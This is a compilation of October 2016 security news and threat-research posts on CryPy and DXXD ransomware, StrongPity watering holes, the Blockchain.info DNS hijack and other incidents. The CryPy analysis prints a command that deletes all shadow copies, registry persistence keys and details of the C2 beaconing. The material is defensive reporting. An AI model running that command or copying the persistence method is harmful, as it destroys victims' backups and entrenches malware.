[userhome]\\My Music\\
[userhome]\\My Pictures\\
[userhome]\\My Videos\\
*userhome - The current user home directory

When the encryption step is done, the ransomware will remove the restore points and write the README_FOR_DECRYPT.txt file and execute it. The following screen shot is the ransom note:


CryPy Ransomware Note embedded in the Python code

The threat actor behind the attack asks the victim to contact it via email, and to send a request to the following two email addresses to receive the decryption program:

(1) m4n14k@sigaint[.]org
(2) blackone@sigaint[.]org

Note that the ransom note contains mistakes, implying that it has been written by a non-English speaker. First, the headline is missing a ‘T’ in “IMPORTAN INFORMATION”. Second, the sentence “Decrypting of your files…” is syntatically wrong. Native speakers will be able to find additional mistakes.

The threat actor claims that files will be deleted every 6 hours, which reflects the approach of more advanced ransomwares. However, it forgets to mention proof of decryption or a channel that can be used in cases where the payment process is not responsive. This points to the executable being at an early stage of development.

The ransomware survives a reboot by adding the following keys to the registry:

regkey Software\\Microsoft\\Windows\\CurrentVersion\\Run
subkey Adobe_ReaderX
data %TEMP%\\mw.exe
regkey Software\\Microsoft\\Windows\\CurrentVersion\\Run
subkey explore_
data [userhome]\\Appdata\\local\\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.exe
The code for adding the values to the registry are located on the functions autorun() and autorun2().




These keys cause the computer to execute the files after the computer is restarted.

Right before launching the ransom note, the script calls a delete_shadow() function that takes no arguments, and simply executes the following command line code to remove all shadow copies and prevent recovery from backup:

os.system("vssadmin Delete shadows /all /Quiet")

Lastly, the file calls autorun2() fuction that copies the ransomware from its current location to C:\\Users\\\\AppData\\Local with hardcoded name:

C2 Communication
The ransomware hides behind an Israeli web server which was compromised using Shell script arbitrary upload written in PHP. The compromise and upload were possible because the server carried a vulnerable Magento CMS.

The executable transfers data over an unencrypted HTTP channel in clear-text. This allows for easy traffic inspection using a network listener. The following screenshot is the traffic being sent to the server:


Inspecting the Magento exploit and the compromised server, we found that the origin of the upload carries the title Pak Haxor – Auto Xploiter and the email ardiansyah09996@gmail[.]com and that the file was uploaded in August 2016, which aligns with the case in subject. The following screenshot reveals how attackers are using massive exploiters that scan for vulnerable web servers and exploit the vulnerability, which they later visit to expand their control over the server:


Part of such an exploitation technique is dropping additional PHP scripts to refine a more sophisticated attack, such as the CryPy ransomware.

One such script can be found hard-coded in the CryPy Python code, in the form of a GET request. The request is sent with two parameters to a script that was uploaded using the Auto Xploiter and carries the name victim.php. By reviewing the Python code it is easier to understand the type of data being presented in Base64 encoding format.


As seen in the screenshot above, the configurl parameter accepts a URL querystring where the victim_info input value of the info parameter is derived from the platform module.

uname() is used when one wants to return a tuple of system, node, release, version, machine and processor values. These are encoded with Base64.

The next parameter is ip which contains the socket.gethostname() which basically collects an IP address.

The querystring is then sent to urllib.urlopen(), which will send a GET request to the selected server and read the reponse content into glob_config.

The response contains a JSON format payload which is checked for the following keys:
x_ID – the victim’s unique ID to request their decryption keys after payment.
x_UDP – Not used; perhaps saved for future use.
x_PDP – Not used; perhaps saved for future use.

The second call is implemented in a function called generate_file() which is responsible for fetching a unique key for each file before encryption.

We have seen in recent lockers that, in order to demonstrate trust and integrity, the victim is able to decrypt one/two files before processing the payment. This proves decryptor validity. In order to randomly choose a file, the attacker must first generate a unique token for each one. The second PHP script found in the code is savekey.php which is described in the following screenshot and is suspected to have the C2 IP in it. It was however deleted long before we were able to reach it.


As for the first call, the second sends two parameters. The first is the file’s name and the other is the victim ID. In return, the server responds with two keys:
X – Unique key after encryption which will be appended to the file’s header.
Y – New filename which will be stored instead of the previous one.

These parameters are then sent to an encryption routine, along with the file’s original name.

REG Keys





8bd7cd1eee4594ad4886ac3f1a05273b crypy.exe
1ed3f127a0e94394ef049965bbc952ef encryptor.py



Bitcoin Wallet Blockchain.info went down due to a DNS Hijacking
13.10.2016 securityaffairs Hacking

Blockchain.info, the world’s most popular Bitcoin wallet and Block Explorer service went down this week due to a DNS Hijacking attack.
Crypto-currencies continue to be a privileged target of cyber criminals, Bitcoin wallets and services provided by many companies operating in the industries have been targeted by criminal organizations as never before.

Blockchain.info, the world’s most popular Bitcoin wallet and Block Explorer service, suffered a mysterious outage this week and experts speculated that a cyber attack has disrupted the platform.

“Looks like our site is down. We’re working on it and should be back up soon.” reads the message displayed to the visitors during the downtime.

BlockChain informed its users about a possible DNS issue via Twitter.

Blockchain ✔ @blockchain
We're researching a DNS issue and looking into it. We apologize for the inconvenience. Stay tuned.
12:26 - 12 Ott 2016
67 67 Retweet 60 60 Mi piace

“We’re making progress resolving the issue, but it may take upwards of several hours until services are fully restored,” states a second Tweet from the company while users were not able to access their online accounts.

At the same time, someone on Reddit reported the changes in the DNS records.

It looks like blockchain.info has just had their domain name hijacked. The whois and DNS records suddenly jumped from CloudFlare to a cheap web host. From the cache, the names used to be
and were then changed to
Name Server: DED88057-1.HOSTWINDSDNS.COM
Name Server: DED88057-2.HOSTWINDSDNS.COM
when queried these are returning
blockchain.info. 11360 IN A
blockchain.info. 14400 IN A″


What happened?
The DNS server records for blockchain.info and blockchain.com were hijacked. Usually, this practice allows crooks to conduct phishing attacks in order to steal bitcoin wallet credentials.

Experts from OpenDns early detected the change in nameservers:

dnsstream @dnsstream
critical: blockchain(.)info now has completely new nameservers (ded91868-1(.)hostwindsdns(.)com,ded91868-2(.)hostwindsdns(.)com)
12:34 - 12 Ott 2016
2 2 Retweet 3 3 Mi piace
Experts at OpenDns investigates on the IP changes:

OpenDNS blocked the above IPs to prevent their customers using Bitcoins to fall victim of the scammer.

Fortunately, nothing happened to the Blockchain users, but DNS hijacking are very dangerous because unaware users could be redirected to rogue websites that mimic the legitimate ones in the attempt of stealing credentials.

Below the official statement issued by the company about the incident:

“Earlier today, we discovered our DNS registrar had been compromised. We took immediate action to resolve the issue. To be abundantly cautious, we’re waiting for the DNS to propagate universally across the web before bringing our services back. Once DNS has propagated, we expect to restore services ASAP. Our sincerest apologies for any inconvenience.”

At the time I was writing there is no news regarding potential breaches of the users’ bitcoin wallets.

Experts observed several malvertising campaigns deliver Cerber 4.0
13.10.2016 securityaffairs Virus

Cerber 4.0 is the latest variant of the Cerber ransomware family that is becoming even more common in the malvertising campaign in the wild.
Another variant of the notorious Cerber ransomware, the Cerber 4.0, appeared in the wild delivered by several exploit kits, including RIG, Neutrino, and Magnitude EKs.

According to the experts from Trend Micro, the Cerber 4.0 first appeared in October and became very popular in the criminal ecosystem where it is still used to power several malvertising campaigns.

The Cerber ransomware has rapidly evolved since its first apparition, it is considered one of the greatest success of the Ransomware-as-a-service (RaaS).

The Cerber 4.0 was released in the wild a few weeks after the version 3.0, it encrypts files and appends a randomly generated file extension (while the previously used extensions were .cerber3, .cerber2, .cerber).

The newest variant has shifted from an HTML ransom note to an HTA one.

The experts noticed that recently Cerber 4.0 is mainly dropped by the RIG toolkit, which is also the most active Exploit kit in this period.

The RIG toolkit was observed for example in the PseudoDarkleech malvertising campaign that was previously seen distributing ransomware such as CrypMIC and CryptXXX.

“As we reported previously, Cerber has become one of the most prominent ransomware families of 2016. It has a wide range of capabilities and is often bought and sold as a service (ransomware-as-a-service or RaaS)—even earlier versions were peddled as RaaS in underground markets. The rapid release of Cerber updates have made it an increasingly popular payload for several exploit kits. ” reported TrendMicro.

The experts also noticed another malvertising campaign dropping the Cerber 4.0 via the Magnitude exploit kit. The campaign has been seen targeting devices in numerous Asian countries, including Taiwan, Korea, Hong Kong, Singapore, and China.

The experts noticed many other campaigns leveraging on the Cerber 4.0 including one that usually employs a casino-themed fake advertisement.


Another campaign started on October 3 is leveraging the Neutrino exploit kit to target users in the US, Germany, Spain, Taiwan, and Korea.

“Malvertising and exploit kits in general are being developed and improved constantly by cybercriminals, so keeping software updated with the latest security patches is critical for users and enterprises. This includes both the operating system and all applications being used. Make sure there is a security system in place that can proactively provide a comprehensive defense against attackers targeting new vulnerabilities,” Trend Micro researchers note.

Vera Bradley retail chain notifies customers of data breach
13.10.2016 securityaffairs Crime

The American retail chain Vera Bradley announced that hackers have stolen a yet undetermined number of payment card data from its systems.
The American retail chain Vera Bradley is the last victim of a data breach, the company announced that hackers have stolen a yet undetermined number of payment card data.

The breaches affected customers shopping at its 112 stores and 44 outlets between in the period between 25 July and 23 September 2016. It seems that customers shopping on the official website was not impacted.

The FBI alerted the Vera Bradley company to the breach on 15 September, experts from the forensics firm Mandiant that investigated the incident confirmed the theft of credit card track data.

“On September 15, 2016, Vera Bradley was provided information from law enforcement regarding a potential data security issue related to our retail store network. Upon learning this information, we immediately notified the payment card networks and initiated an investigation with the assistance of a leading computer security firm to aggressively gather facts and determine the scope of the issue.” states the official announcement published by the company.

“Payment cards used at Vera Bradley retail store locations between July 25, 2016 and September 23, 2016 may have been affected. Not all cards used during this time frame were affected. Cards used on our website have not been affected. Findings from the investigation show unauthorised access to Vera Bradley’s payment processing system and the installation of a program that looked for payment card data,” added the company.

The hackers breached the network of the company and installed a malware on its servers that exfiltrated payment card data.

“The program was specifically designed to find track data in the magnetic stripe of a payment card that may contain the card number, cardholder name, expiration date, and internal verification code – as the data was being routed through the affected payment systems.” states Vera Bradley.

Vera Bradley data-breach

Crooks accessed card number, cardholder name, expiration date, internal verification code, and other information stored in magnetic stripe track of the cards.

“Payment cards used at Vera Bradley retail store locations between July 25, 2016 and September 23, 2016 may have been affected. Not all cards used during this time frame were affected. Cards used on our website have not been affected.” reads the notice of data breach. “On September 15, 2016, Vera Bradley was provided information from law enforcement regarding a potential data security issue related to our retail store network. Upon learning this information, we immediately notified the payment card networks and initiated an investigation with the assistance of a leading computer security firm to aggressively gather facts and determine the scope of the issue. Findings from the investigation show unauthorized access to Vera Bradley’s payment processing system and the installation of a program that looked for payment card data. “

Vera Bradley confirmed that not all credit cards used during the period were exposed, anyway it is important that customers monitor their bank accounts promtly reporting any unauthorised card charges.

The company confirmed to have stopped this incident and said that it is still working with the forensics security firm to improve the security of its systems to prevent similar incidents in the future.

This incident is the latest in a series of recent US retail chain breaches affecting the likes of Wendy’s, Hard Rock Hotel and Casino Las Vegas, and Eddie Bauer.

Trust me, I have a pen
13.10.2016 Kaspersky Security
Earlier today we became aware of a malicious website delivering Petya through the Hunter exploit kit. While there is nothing special about yet another exploit kit page, this one caught our attention because it mimics the index page of our sinkhole systems.


A malicious webpage faking one of our research systems

With cybercriminals increasingly trying to exploit trust relationships in cyberspace, it’s easy to get fooled by such attempts. We believe the criminals attempted to mimic our sinkhole systems in order to avoid being shut down by other researchers.

Just last week we were investigating a case of a serious attack that potentially breached a company. When we collected proof of the attack, we had to contact the company to help them isolate compromised systems and remediate. This brought us to a problem we commonly see today: the problem of trust.

The first reaction you normally have when someone calls you and attempts to convince you must arouse suspicion. In our investigations we normally deal with security personnel, who are highly paranoid people and do not trust anyone by nature. So far, the reaction of the company’s security staff was spot on: get the name of the caller, the company and department name, look up the company contacts using an independent, trusted, verifiable source, contact the company and confirm the facts, asking to connect to the researcher in the office immediately to do additional voice recognition. When that is done, the conversation can be resumed. Such a reaction and verification process is what we consider standard in our business. Unfortunately, we haven’t seen the same level of cautiousness among regular users.

A typical strategy for cybercriminals is to try to hide their tools, exploit kits and other malicious files on a compromised legitimate website or inject a malicious payload into a hijacked banner network account. Attackers also will rip entire websites, or just replace links to redirect visitors to attacker controlled sites, as we observed with the StrongPity watering holes. In this case, they simply counted on the confusion caused by visual appearance.

The fake webpage looks exactly the same as the original one from our research server and there is no point in finding even minor differences. Every webpage on the web can be copied and made to look identical to the source, except for the page’s original address or validated SSL certificate. PGPHtml is an alternative possibility, with each page explicitly stating its host domain or IP and then signed and verified with a public key. The server in question has been reportedly serving the Pony Trojan, hosting the Hunter Exploit Kit and distributing Petya ransomware.

We believe that this was the act of Russian-speaking cybercriminals, who send messages to our side every time their activities are affected by the work we do. We are bringing this to your attention to make you a little bit more cautious. Having said that, our first reaction was laughter, because it brought back some memories of an excellent short video on this matter shot by our colleagues from the security industry. And, because of this history of receiving messages from malware authors in their code and on sites, we think it is unlikely that this site is a watering hole targeting security researchers.

Unfortunately, this game of shadows is a well-known method not only in the criminal world but also in the world of advanced targeted attackers. We have seen in the past that some APT groups use deceiving tactics in order to try to confuse security researchers into wrong attribution. We have seen malware samples in the past where attackers from one group implanted decoys, trying to mimic the behaviour of their rivals. This is done to harden the research process or consume extra time. The attribution process, being the hardest part of any computer investigation, can easily be driven in the wrong direction. However, we have been looking at these attempts for a long time and learned to recognize such false flags. Now we would like you to be cautious and verify everything you see.

Related to this topic, our colleagues recently presented a more in-depth analysis of these techniques at VB 2016. You can read their entire paper here: Wave your false flags!

On the StrongPity Waterhole Attacks Targeting Italian and Belgian Encryption Users
13.10.2016 Kaspersky APT
The StrongPity APT is a technically capable group operating under the radar for several years. The group has quietly deployed zero-day in the past, effectively spearphished targets, and maintains a modular toolset. What is most interesting about this group’s more recent activity however, is their focus on users of encryption tools, peaking this summer. In particular, the focus was on Italian and Belgian users, but the StrongPity watering holes affected systems in far more locations than just those two. Adding in their creative waterholing and poisoned installer tactics, we describe the StrongPity APT as not only determined and well-resourced, but fairly reckless and innovative as well.

Encryption Tools
Clearly this APT is interested in encrypted data and communications. The tools targeted by this group enable practices for securing secrecy and integrity of data. For example, WinRAR packs and encrypts files with strong suites like AES-256, and TrueCrypt encrypts full hard drives all in one swoop. Both WinRAR and TrueCrypt help provide strong and reliable encryption. WinRAR enables a person to encrypt a file with AES-256 in CBC mode with a strong PBKDF2 HMAC-SHA256 based key. And, TrueCrypt provides an effective open-source full disk encryption solution for Windows, Apple, Linux, and Android systems. Using both of these tools together, a sort of one off, poor man’s end-to-end encryption can be maintained for free by putting these two solutions together with free file sharing services.

Other software applications help to support encrypted sessions and communications. Well known applications supporting end-to-end encryption are used by hundreds of millions of folks, sometimes unknowingly, every day. IM clients like Microsoft’s Skype implement 256-bit AES encrypted communications, while Putty, Winscp and Windows Remote Desktop help provide private communications and sessions with fully encrypted communications as well. Most of these communications across the wire are currently unbreakable when intercepted, at least, when the applications are configured properly.

Summer 2016 Watering Hole Resources and Trickery – WinRAR and TrueCrypt
This actor set up a particularly clever site to deliver trojanized WinRAR installers in the summer of 2016, appears to have compromised another, and this activity reminds us somewhat of the early 2014 Crouching Yeti activity. Much of the Crouching Yeti intrusions were enabled by trojanizing legitimate ICS-related IT software installers like SCADA environment vpn client installers and industrial camera software driver installers. Then, they would compromise the legitimate company software distribution sites and replace the legitimate installers with the Crouching Yeti trojanized versions. The tactics effectively compromised ICS and SCADA related facilities and networks around the world. Simply put, even when visiting a legitimate company distribution site, IT staff was downloading and installing ICS-focused malware. StrongPity’s efforts did much the same.

In the case of StrongPity, the attackers were not focused on ICS or SCADA. They set up a domain name (ralrab[.]com) mimicking the legitimate WinRAR distribution site (rarlab[.]com), and then placed links on a legitimate “certified distributor” site in Europe to redirect to their poisoned installers hosted on ralrab[.]com. In Belgium, the attackers placed a “recommended” link to their ralrab[.]com site in the middle of the localized WinRAR distribution page on winrar[.]be. The big blue recommended button (here in French) linked to the malicious installer, while all the other links on the page directed to legitimate software:


Winrar[.]be site with “recommended link” leading to malicious ralrab[.]com

The winrar[.]be site evaluated what “recommended” package a visitor may need based on browser localization and processor capability, and accordingly offered up appropriate trojanized versions. Installer resources named for french and dutch versions, along with 32-bit versus 64-bit compiled executables were provided over the summer:


Directory listing, poisoned StrongPity installers, at rarlrab[.]com

The first available visitor redirects from winrar[.]be to ralrab[.]com first appeared on May 28th, 2016, from the dutch speaking version of the winrar.be site. And around the same time, another “certified distributor” winrar[.]it served trojanized installers as well. The major difference here is that we didn’t record redirections to ralrab[.]com, but it appears the site directly served StrongPity trojanized installers:

The site started serving these executables a couple of days earlier on 5/24, where a large majority of Italian visitors where affected.


Download page, winrar[.]it

Quite simply, the download links on this site directed visitors to trojanized WinRAR installers hosted from the winrar.it site itself. It’s interesting to note that both of the sites are “distributors”, where the sites are owned and managed not by rarlabs, but by local owners in individual countries.

StrongPity also directed specific visitors from popular, localized software sharing sites directly to their trojanized installers. This activity continued into late September 2016. In particular, the group redirected visitors from software aggregation and sharing site tamindir[.]com to their attacker-controlled site at true-crypt[.]com. The StrongPity controlled Truecrypt site is a complete rip of the legitimate site, now hosted by Sourceforge. Here is the Tamindir truecrypt page, looks harmless enough.


TrueCrypt page, tamindir software sharing site

Unlike the newer poisoned WinRAR installers, StrongPity hosted several Much like the poisoned WinRAR installers, multiple filenames have been used to keep up with visitor interests. Visitors may have been directed to
the site by other means and downloaded directly from the ripped and persuasive site.


true-crypt[.]com malicious StrongPity distribution site

At the very bottom of the page, there are a couple of links to the poisoned installers:

Referrers include these localized software aggregates and sharers:

It’s interesting that Ksn recorded appearance of the the file on two unique systems in December 2015, a third in January 2016, all in Turkey, and then nothing until May 2016. Then, deployment of the installers
continued mostly within Turkey in July and September 2016.

Summer 2016 Watering Hole Victim Geolocations – WinRAR and TrueCrypt
Over the course of a little over a week, malware delivered from winrar.it appeared on over 600 systems throughout Europe and Northern Africa/Middle East. Likely, many more infections actually occurred.
Accordingly, the country with the overwhelming number of detections was in Italy followed by Belgium and Algeria. The top countries with StrongPity malware from the winrar.it site from May 25th through the first few days of June are Italy, Belgium, Algeria, Cote D’Ivoire, Morroco, France, and Tunisia.


winrar[.]it StrongPity component geolocation distribution

In a similar time-span, the over sixty visitors redirected from winrar.be to ralrab.com for malicious file download were overwhelmingly located in one country. The top countries directed to StrongPity malware from the winrar.be site from May 25th through the first few days of June are Belgium, Algeria, Morroco, Netherlands, Canada, Cote D’Ivoire, and Tunisia.


winrar[.]be StrongPity component geolocation distribution

StrongPity previously set up TrueCrypt themed watering holes in late 2015. But their offensive activity surged in late summer 2016. The group set up a site directly pulled from the contents of the legitimate TrueCrypt website. From mid July to early September, dozens of visitors were redirected from tamindir[.]com to true-crypt[.]com with unsurprisingly almost all of the focus on systems in Turkey, with victims in the Netherlands as well.


tamindir[.]com to true-crypt[.]com poisoned TrueCrypt installer redirects

StrongPity Malware
The StrongPity droppers were often signed with unusual digital certificates, dropping multiple components that not only provide complete control of the victim system, but effectively steal disk contents, and can download components for further collection of various communications and contacts. Because we are talking about StrongPity watering holes, let’s take a quick look at what is being delivered by the group from these sites.

When we count all systems from 2016 infected with any one of the StrongPity components or a dropper, we see a more expansive picture. This data includes over 1,000 systems infected with a StrongPity component. The top five countries include Italy, Turkey, Belgium, Algeria, and France.


In the case of the winrar[.]be/ralrab[.]com watering hole malware, each one of the six droppers that we observed created a similar set of dropped components on disk. And, in these cases, the attackers did not re-use their fake digital certificates. In addition to installing the legitimate version of WinRAR, the dropper installed the following StrongPity components:

Of these files, two are configurable and encrypted with the same keyless cipher, “wrlck.cab” and “prst.cab”. While one maintains several callback c2 for the backdoor to fetch more instructions and upload installed software and file paths, the other maintains something a bit more unusual. “prst.cab” maintains an encrypted list of programs that maintain encrypted connections. This simple encoding takes the most significant nibble for each character, swaps the nibbles of that byte, and xors the result against the original value. Its code looks something like this:

x = s[i];
j = ((x & 0xF0)>>4);
y = x ^ j;
Using that cipher in the ralrab[.]com malware, the package is configured to seek out several crypto-enabled software applications, highlighting the group’s interest in users of more encryption-supported software suites.

putty.exe (a windows SSH client)
filezilla.exe (supports ftps uploads)
winscp.exe (a windows secure copy application, providing encrypted and secure file transfer)
mstsc.exe (Windows Remote Desktop client, providing an encrypted connection to remote systems)
mRemoteNG.exe (a remote connections manager supporting SSH, RDP, and other encrypted protocols)
Also included in StrongPity components are keyloggers and additional data stealers.

Widely available, strong cryptography software tools help provide secure and private communications that are now easily obtained and usable. In the summer of 2016, multiple encryption-enabled software applications were targeted with watering hole, social engineering tactics, and spyware by the StrongPity APT. While watering holes and poisoned installers are tactics that have been effectively used by other APT, we have never seen the same focus on cryptographic-enabled software. When visiting sites and downloading encryption-enabled software, it has become necessary to verify the validity of the distribution site and the integrity of the downloaded file itself. Download sites not using PGP or strong digital code signing certificates need to re-examine the necessity of doing so for their own customers. We have seen other APT such as Crouching Yeti and Darkhotel distribute poisoned installers and poisoned executable code, then redistribute them through similar tactics and over p2p networks. Hopefully, simpler verification systems than the current batch of PGP and SSL applications will arise to be adopted in larger numbers. Until then, strong anti-malware and dynamic whitelisting solutions will be more necessary than ever.

BlockChain.info Domain Hijacked; Site Goes Down; 8 Million Bitcoin Wallets Inaccessible
13.10.2016 thehackernews Hacking
UPDATE: The site is back and working. Blockchain team released a statement via Twitter, which has been added at the end of this article.
If you are fascinated with the idea of digital currency, then you might have heard about BlockChain.Info.
It’s Down!
Yes, Blockchain.info, the world's most popular Bitcoin wallet and Block Explorer service, has been down from last few hours, and it's believed that a possible cyber attack has disrupted the site.
The site is down at the time of writing, and the web server reports a bad gateway error, with a message on the website that reads:
"Looks like our site is down. We're working on it and should be back up soon."
With more than 8 million Digital Wallet customers, BlockChain is users' favorite destination to see recent transactions, stats on mined blocks and bitcoin economy charts.
A few hours ago, BlockChain team tweeted about the sudden breakdown of the site, saying: "We're researching a DNS issue and looking into it. We apologize for the inconvenience. Stay tuned."
"We're making progress resolving the issue, but it may take upwards of several hours until services are fully restored," another tweet reads.
However, a Reddit user has noted that "The whois and DNS records suddenly jumped from CloudFlare to a cheap web host."
It seems that their domain name has been hijacked, which was later confirmed by the BlockChain team on Reddit, saying:
"Hey everyone, our DNS provider was targeted. It's going to be several hours before our services are fully restored. The CloudFlare DNS is propagating now."
Until resolved, which may take next few hours, Blockchain.info digital wallet users would not be able to access their online accounts. In response to this incident, Blockchain users are in hopes that their online wallet has not been hacked or funds stolen.
Since its DNS server has been hijacked, it could be possible that an attacker can host a fake web page on the same domain in an effort to steal your bitcoin wallet credentials.
So, Blockchain users are strongly recommended not to log in to the site until the Blockchain team releases an official statement via its Twitter account.
Official Statement From BlockChain:
"Earlier today, we discovered our DNS registrar had been compromised. We took immediate action to resolve the issue. To be abundantly cautious, we’re waiting for the DNS to propagate universally across the web before bringing our services back. Once DNS has propagated, we expect to restore services ASAP. Our sincerest apologies for any inconvenience."
However, there is no statement from the Blockchain.info team that suggests any hacking or compromise of its users bitcoin wallets.

Researchers Demonstrated How NSA Broke Trillions of Encrypted Connections
12.10.2016 thehackernews  BigBrothers
In the year 2014, we came to know about the NSA's ability to break Trillions of encrypted connections by exploiting common implementations of the Diffie-Hellman key exchange algorithm – thanks to classified documents leaked by ex-NSA employee Edward Snowden.
At that time, computer scientists and senior cryptographers had presented the most plausible theory: Only a few prime numbers were commonly used by 92 percent of the top 1 Million Alexa HTTPS domains that might have fit well within the NSA's $11 Billion-per-year budget dedicated to "groundbreaking cryptanalytic capabilities."
And now, researchers from University of Pennsylvania, INRIA, CNRS and Université de Lorraine have practically proved how the NSA broke the most widespread encryption used on the Internet.
Diffie-Hellman key exchange (DHE) algorithm is a standard means of exchanging cryptographic keys over untrusted channels, which allows protocols such as HTTPS, SSH, VPN, SMTPS and IPsec to negotiate a secret key and create a secure connection.
Since applications that rely on the Diffie-Hellman key exchange algorithm generates ephemeral keys using groups of large prime numbers, it would take hundreds or thousands of years and a nearly unimaginable amount of money to decrypt secure communications directly.
However, it took researchers just two months and as many as 3,000 CPUs to break one of the 1,024-bit keys that are used to secure communications on the Internet today, which could have allowed them to passively decrypt hundreds of millions of HTTPS-based communications and other Transport Layer Security (TLS) channels.
Encrypted communications could have an undetectable backdoor
You might be wondering how the researchers managed to do something which practically takes hundreds of years, with the computational hardware available today.
In a research paper [PDF] published Tuesday, the researchers explained that the Diffie-Hellman algorithm does not contain any backdoor itself, but it has been intentionally weakened in an undetectable way by hiding the fact how various applications generate prime numbers.
Additionally, the size of keys (i.e. less than or equals to 1024-bit) chosen to be used in the Diffie-Hellman algorithm also matters a lot.
The researchers created a weak 1024-bit Diffie-Hellman trapdoor function, i.e. randomly selecting large prime number but from a predefined group, and showed that solving the discrete logarithm problem that underpins its security is about 10,000 times easier.
"Current estimates for 1024-bit discrete log in general suggest that such computations are likely within range for an adversary who can afford hundreds of millions of dollars of special-purpose hardware," the researchers wrote in their paper.
So, advanced hackers or well-resourced agencies who are aware of the fact how prime numbers are being generated for trapdoor function and looking to decrypt 1024-bit secured communications can unscramble the discrete logarithm in order to decrypt hundreds of millions of Diffie-Hellman-protected communications.
"The discrete logarithm computation for our backdoored prime was only feasible because of the 1024-bit size, and the most effective protection against any backdoor of this type has always been to use key sizes for which any computation is infeasible," the researchers said.
Researchers also estimate that conducting similar computations for 2048-bit keys, even with backdoored prime numbers, would be 16 Million times harder in comparison to 1024-bit keys and will remain infeasible for many upcoming years.
Despite the U.S. National Institute of Standards and Technology (NIST) recommending a transition to key sizes of at least 2,048 bits since 2010, the 1024-bit keys are still widely used online.
According to a survey performed by the SSL Pulse project, 22% of the Internet's top 140,000 HTTPS-protected sites use 1024-bit keys as of last month, which can be broken by nation-sponsored adversaries or intelligence agencies like NSA.
Therefore, the immediate solution to this issue is to switch to 2048-bit or even 4,096-bit keys, but, according to the researchers, in the future, all standardized prime numbers should be published together with their seeds.
The concept of backdooring primes used in the Diffie-Hellman key exchange algorithm is almost similar to the one discovered in the Dual Elliptic Curve Deterministic Random Bit Generator, better known as Dual_EC_DRBG, which is also believed to have been introduced by the NSA.
Almost three years ago, Snowden leaks revealed that RSA received $10 Million bribe from the NSA to implement their flawed cryptographic algorithm Dual_EC_DRBG in its bSafe Security tool as a default protocol in its products to keep encryption weak.
So, it is not at all surprising if the NSA would be using these undetectable and weakened "trapdoors" in millions of cryptographic keys to decrypt encrypted traffic over the Internet.

Facebook, Twitter and Instagram Share Data with Location-based Social Media Surveillance Startup
12.10.2016 thehackernews  Social
Facebook, Instagram, Twitter, VK, Google's Picasa and Youtube were handing over user data access to a Chicago-based Startup — the developer of a social media monitoring tool — which then sold this data to law enforcement agencies for surveillance purposes, the ACLU disclosed Tuesday.
Government records obtained by the American Civil Liberties Union (ACLU) revealed that the big technology corporations gave "special access" to Geofeedia.
Geofeedia is a controversial social media monitoring tool that pulls social media feeds via APIs and other means of access and then makes it searchable and accessible to its clients, who can search by location or keyword to quickly find recently posted and publicly available contents.
The company has marketed its services to 500 law enforcement and public safety agencies as a tool to track racial protests in Ferguson, Missouri, involving the 2014 police shooting death of Mike Brown.
With the help of a public records request, the civil rights group found that Geofeedia had entered into agreements with Twitter, Facebook, and Instagram for their users' data, gaining a developer-level access to all three social networks that allowed them to review streams of user content in ways that regular users of the public cannot.
The Denver Police Department recently signed a $30,000 annual deal with Geofeedia.
Here's what the major tech giants offered Geofeedia:
Facebook allowed the company to use its "Topic Feed API" that let Geofeedia obtain a "ranked feed of public posts" centered around specific hashtags, places or events.
Instagram provided Geofeedia access to its API (Application Programming Interface) that is a feed of data from users' public Instagram posts, including their location.
Twitter provided Geofeedia with "searchable access" to its database of public tweets. However, Twitter added additional contract terms in February to try to safeguard further against surveillance, and when found Geofeedia still touting its product as a tool to monitor protests, Twitter sent Geofeedia a cease and desist letter.
Facebook, Instagram, and Twitter have all moved to restrict access to Geofeedia after learning about the tool's activities when presented with the study's findings.
The ACLU is concerned that Geofeedia can "disproportionately impact communities of color" by monitoring activists and their neighborhoods.
Nicole Ozer, technology, and civil liberties policy director for the ACLU of California said: "These special data deals were allowing the police to sneak in through a side door and use these powerful platforms to track protesters."
However, in response to the ACLU report, Geofeedia posted Tuesday an article justifying its commitment to Freedom of Speech and Civil Liberties, releasing the following statement:
"Geofeedia has in place clear policies and guidelines to prevent the inappropriate use of our software; these include protections related to free speech and ensuring that end-users do not seek to inappropriately identify individuals based on race, ethnicity, religious, sexual orientation or political beliefs, among other factors."
Facebook said in a statement that Geofeedia only had access to publically available data, while Twitter said it was suspending access shortly.
The ACLU is encouraging social media companies to adopt clear, public, and transparent policies prohibiting developers from exploiting user data for surveillance purposes.

DXXD Ransomware, displays legal notice and encrypts files on unmapped network shares
12.10.2016 securityaffairs Virus

The DXXD ransomware specifically targets servers and is able to encrypt files on network shares even if they haven’t been mapped.
Malware continues to evolve, the last threat in order of time that implemented a singular feature is the DXXD ransomware. The peculiarities of this threat is that it encrypts also file on network shares, even if they are, unmapped ( a feature already implemented by the Locky ransomware) and displays a legal notice.

The DXXD ransomware appends the. dxxd extension to the encrypted files, then it leaves a ransom note onto the infected machine. The DXXD ransom note contains instructions for the victims that need to contact rep_stosd@protonmail.com or rep_stosd@tuta.io.to the encrypted files, then it leaves a ransom note onto the infected machine. The DXXD ransom note contains instructions for the victims that need to contact rep_stosd@protonmail.com or rep_stosd@tuta.io.

Another interesting feature of the malware is its ability to configure a Windows Registry setting in order to display a sort of “legal notice” when people log into a computer. The VXers used this feature to allow a user who tries to login to the server to see the ransom note.

The DXXD ransomware changes the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption registry key and the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText to display the following note.

“When you start Windows, Windows Defender works to help protect your PC by scanning for malicious or unwanted software.”

dxxd ransomware legal-notice

It is still unclear the infection vector, Abrams speculate the threat is spread by abusing Remote Desktop Services.

“Based on information discovered, I believe that the ransomware developer is hacking into servers using Remote Desktop Services and brute forcing passwords. If you have been affected by the DXXD Ransomware, you should reset all the passwords for the affected machine.” wrote Lawrence Abrams.

According to Abrams, the author of the DXXD ransomware decided to taunt victims and experts who help victims by creating an account on BleepingComputer and claiming that a newer version of the threat it is more difficult to decrypt. The developer also claimed to have exploited a zero-day vulnerability to compromise servers and deliver the malware.

dxxd ransomware developer-no-rdp

As usual, let me discourage from paying the ransomware because there is no guarantee that you will receive back your files. Don’t forget to back up your data frequently and use anti-malware solutions. In the specific case, it could be better to disable Remote Desktop Protocol (RDP) and files running from AppData/LocalAppData folders.